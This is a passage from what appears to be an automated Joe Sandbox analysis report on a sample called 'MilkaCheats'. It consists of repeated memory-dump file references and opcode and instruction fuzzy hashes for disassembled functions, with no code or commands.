                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3ba8877f42b945a50daacabfbdb6e8945b1bca160f52dce02565f1f1f28ade50
                                                                                              • Instruction ID: 85a1cc7997f8eaae5256212871e32afba83b0444be1145b08098cef266c44f38
                                                                                              • Opcode Fuzzy Hash: 3ba8877f42b945a50daacabfbdb6e8945b1bca160f52dce02565f1f1f28ade50
                                                                                              • Instruction Fuzzy Hash: 44D10771A0C3A14FC725CF28D49052EFBE1AF95314F1A87ADE8E58B392D7319815C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2288ac82e1020bfa3f123461b6987ee1429546743d506c334ac192e62159800a
                                                                                              • Instruction ID: 52f8c3b260da4b79cb60e88280ebc96183543ea04cc3830b7a511f253d9e9715
                                                                                              • Opcode Fuzzy Hash: 2288ac82e1020bfa3f123461b6987ee1429546743d506c334ac192e62159800a
                                                                                              • Instruction Fuzzy Hash: 82D12B72D046E58FDB11CA7CC880399BFA26B97324F1E8395D5A5AB3C2C2768806C761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4598926c780e4a92f3bee49001382577d172e4456098eb4f935525ab9b1f10fb
                                                                                              • Instruction ID: b97ff2b1282049b2d0da889a7778890bf77db46b96996131ae076cc51b7b7f6b
                                                                                              • Opcode Fuzzy Hash: 4598926c780e4a92f3bee49001382577d172e4456098eb4f935525ab9b1f10fb
                                                                                              • Instruction Fuzzy Hash: 41C15EB29487458FC370CF68CC86BABB7E1BF85318F08492DD2D9C6642E778A155CB46
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee935a4466a0e2b1a0a9fd8fcf0d374322598fd08faaca92de9fefeeba6a20f3
                                                                                              • Instruction ID: 7520ab8e5076dafab6c0707f13d4131537b86adbf573c8f46b8f0e7a16b0c6ef
                                                                                              • Opcode Fuzzy Hash: ee935a4466a0e2b1a0a9fd8fcf0d374322598fd08faaca92de9fefeeba6a20f3
                                                                                              • Instruction Fuzzy Hash: A1A1BD75B083129BC728CF28C89062EB7F2BF89710F15892CEA958B351D735ED51CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 240595e57a081004527e130d73b5d3b9f5c686dc83303627eeca40f8379185a4
                                                                                              • Instruction ID: fd4b439679ff0a289c9fd9e9666ee96e75a6547766c66fe32cda2a34f30838ec
                                                                                              • Opcode Fuzzy Hash: 240595e57a081004527e130d73b5d3b9f5c686dc83303627eeca40f8379185a4
                                                                                              • Instruction Fuzzy Hash: CFB1257260C3908FC3189A3CA95436ABFD2ABD9324F1D4A3EE4E6873D6D774C9148316
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a521c380a6ef59328f7263234433a188d269ef9d4b63ae2ff511dab9f2c41131
                                                                                              • Instruction ID: 26bd99451c3dad2909b096e10c746361a23b15394e717f4721b7e7cb182824d9
                                                                                              • Opcode Fuzzy Hash: a521c380a6ef59328f7263234433a188d269ef9d4b63ae2ff511dab9f2c41131
                                                                                              • Instruction Fuzzy Hash: 16C1E071615F808FD3269B38C8583A6BBE5AB56324F188E7DD8FB873C6D775A1048702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d24232fb38b14cede3f649859ab0cd925123cd61fd3696532827271080bb123
                                                                                              • Instruction ID: 997d8ca6de5d3d8f31913e6b7e79b25ed553f706e887e88ed8e97334f5f85117
                                                                                              • Opcode Fuzzy Hash: 5d24232fb38b14cede3f649859ab0cd925123cd61fd3696532827271080bb123
                                                                                              • Instruction Fuzzy Hash: 40A1DE31A0C3868FD714CE24C0943BEBBE2AFD5304F18896DEAD567792D3359949DB82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 469aef10517c8e6ed11567e95d59437010425f616737405d574992db5c7d68d2
                                                                                              • Instruction ID: 3a50d81f21baffcf5e6f02ce51dd085eb7892639d962efcd1379c2d438dd7efd
                                                                                              • Opcode Fuzzy Hash: 469aef10517c8e6ed11567e95d59437010425f616737405d574992db5c7d68d2
                                                                                              • Instruction Fuzzy Hash: C981D4783007409FD7698B68C8D0A3673A2FB99320F64AA6DD6D7476A6C771EC42CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58e011baf1f274a15ca0d2b85e0930cb7fbb668362ca05df75c81775f8321d0a
                                                                                              • Instruction ID: b37447ddc7ed5dca2de04ad2a240cbfb6fe3faca50354ade1431564455d7efcb
                                                                                              • Opcode Fuzzy Hash: 58e011baf1f274a15ca0d2b85e0930cb7fbb668362ca05df75c81775f8321d0a
                                                                                              • Instruction Fuzzy Hash: A0B1D071508B808FD725DB38C8597AABFE0AB56314F484E6DD4EBC7382E375E0098B52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 563d7daf164b4fed33da84d1926617c64e4ef01414d8237d64bb4c958d90a038
                                                                                              • Instruction ID: 0ead804769a89140c6557445affd36570b50f3f738ea79304fa8c0113e74adc2
                                                                                              • Opcode Fuzzy Hash: 563d7daf164b4fed33da84d1926617c64e4ef01414d8237d64bb4c958d90a038
                                                                                              • Instruction Fuzzy Hash: A381F4B96043129FD718DF18C891A2AB7F2FF98710F19852CE9958B361E730EE51CB85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb8faee804e823a104e24101c70fdb1ab6c5a7c9383b4e6ba0c93962bc8aa6c7
                                                                                              • Instruction ID: 62f421c7cbbaf2dc15432730546d84512a922752dd47936b7735ac107cf2f49c
                                                                                              • Opcode Fuzzy Hash: fb8faee804e823a104e24101c70fdb1ab6c5a7c9383b4e6ba0c93962bc8aa6c7
                                                                                              • Instruction Fuzzy Hash: 91B12872609B808BC3158A38D8943EABFE2AFD6314F1D897CD4DE8B346DB396449C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a725ce10067c5c86e93e244941834ec4d336aa822e19a2b916f881735527c625
                                                                                              • Instruction ID: 8d3e1d961eb3c2ac075d339de2ebd563ad179ae47785eb33ee55dc39f6307804
                                                                                              • Opcode Fuzzy Hash: a725ce10067c5c86e93e244941834ec4d336aa822e19a2b916f881735527c625
                                                                                              • Instruction Fuzzy Hash: DA9140B2A083499BE7658E55C48033BB7D2AFA0324F1C857DEA854B751D7F4DE09E382
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c86c58ad7a1e8342798cdd8c05a9322cebf3141648c40c5ae5c6ccf8a9b1d0ad
                                                                                              • Instruction ID: c77342cb72f51e18c6f4d668e0ed66babc1206b08baac3af48dbfdc800a26d5c
                                                                                              • Opcode Fuzzy Hash: c86c58ad7a1e8342798cdd8c05a9322cebf3141648c40c5ae5c6ccf8a9b1d0ad
                                                                                              • Instruction Fuzzy Hash: 1951E1B06043049BEB249F24CC96BB733B4EF82B68F054568F985CB291F375D840C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2199d5db8f011725805a65f7e69af872dd2df59057d4f4cabfeae211ddd84e5b
                                                                                              • Instruction ID: e4a25dcfb8be5cfe88e515da5682c476b1de16274a9200679b0da4a06357a852
                                                                                              • Opcode Fuzzy Hash: 2199d5db8f011725805a65f7e69af872dd2df59057d4f4cabfeae211ddd84e5b
                                                                                              • Instruction Fuzzy Hash: 38A10775A08B808FD3158B38D4953A7BFE2AF96304F08897DD4EE8B387D77964498712
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75587898d4b20287e5d10b609ca1fbdbe6397157e5c19bc964121fa90aad5611
                                                                                              • Instruction ID: b858f25b15917993ecf38bed5650bdf12b2668f9bcb542bb5b467b8cb735ca3d
                                                                                              • Opcode Fuzzy Hash: 75587898d4b20287e5d10b609ca1fbdbe6397157e5c19bc964121fa90aad5611
                                                                                              • Instruction Fuzzy Hash: 2BA1E571A08B908FD3158B38D4953ABBFE1AF96308F09887CC5DE8B747D6796409CB12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 035966e59cb089cc9ecec3b7a66a914e959d588b8aaa53a1e4d444320fb6b78e
                                                                                              • Instruction ID: be2ebb8b26e23f0987e2d764d565b6855e7c0af5b51310f5e93d82c86a1ecedf
                                                                                              • Opcode Fuzzy Hash: 035966e59cb089cc9ecec3b7a66a914e959d588b8aaa53a1e4d444320fb6b78e
                                                                                              • Instruction Fuzzy Hash: 6C91C8B19083528FC718CB14D4A15ABF7D2AFD5314F19492EF4E987242D734E989CB93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 156ef6ffea12f41daa75d01c8c9d69208e4feeab28ba26f8fa8cb0801c74a859
                                                                                              • Instruction ID: 395feafe7b64ccbb05956eb8c24310aaf19785c23664f3c15f4c5c61a0bf4f7a
                                                                                              • Opcode Fuzzy Hash: 156ef6ffea12f41daa75d01c8c9d69208e4feeab28ba26f8fa8cb0801c74a859
                                                                                              • Instruction Fuzzy Hash: B87124F690874A9BE7758A19C400337F7D2AFE0324F19C25DDAAA8BB40E771CA04E741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5a6a8b78d6897a9693bedb438211d75863f0ba07d725300655134a4406406dc
                                                                                              • Instruction ID: 7ebd93e48f75502024ae248089678e78897777e6633a064fac958d392f2b5539
                                                                                              • Opcode Fuzzy Hash: a5a6a8b78d6897a9693bedb438211d75863f0ba07d725300655134a4406406dc
                                                                                              • Instruction Fuzzy Hash: 74517037E199AC4BE7248D3C4D0227D6A530BD733072EC366DEB19B7D5C6259D06A390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66b225f534b4c92af21b40b67d74a3dd92fcbfcd04dd7a83c7aff41045d5d052
                                                                                              • Instruction ID: 66a879bbd7d4a3797e37ce9e2dfc2705317f8be85f6324041fe800090fde18ad
                                                                                              • Opcode Fuzzy Hash: 66b225f534b4c92af21b40b67d74a3dd92fcbfcd04dd7a83c7aff41045d5d052
                                                                                              • Instruction Fuzzy Hash: CF514EB16087548FE314DF69D49475BBBE1BBC4314F044E2DE4E987351E379D6088B82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
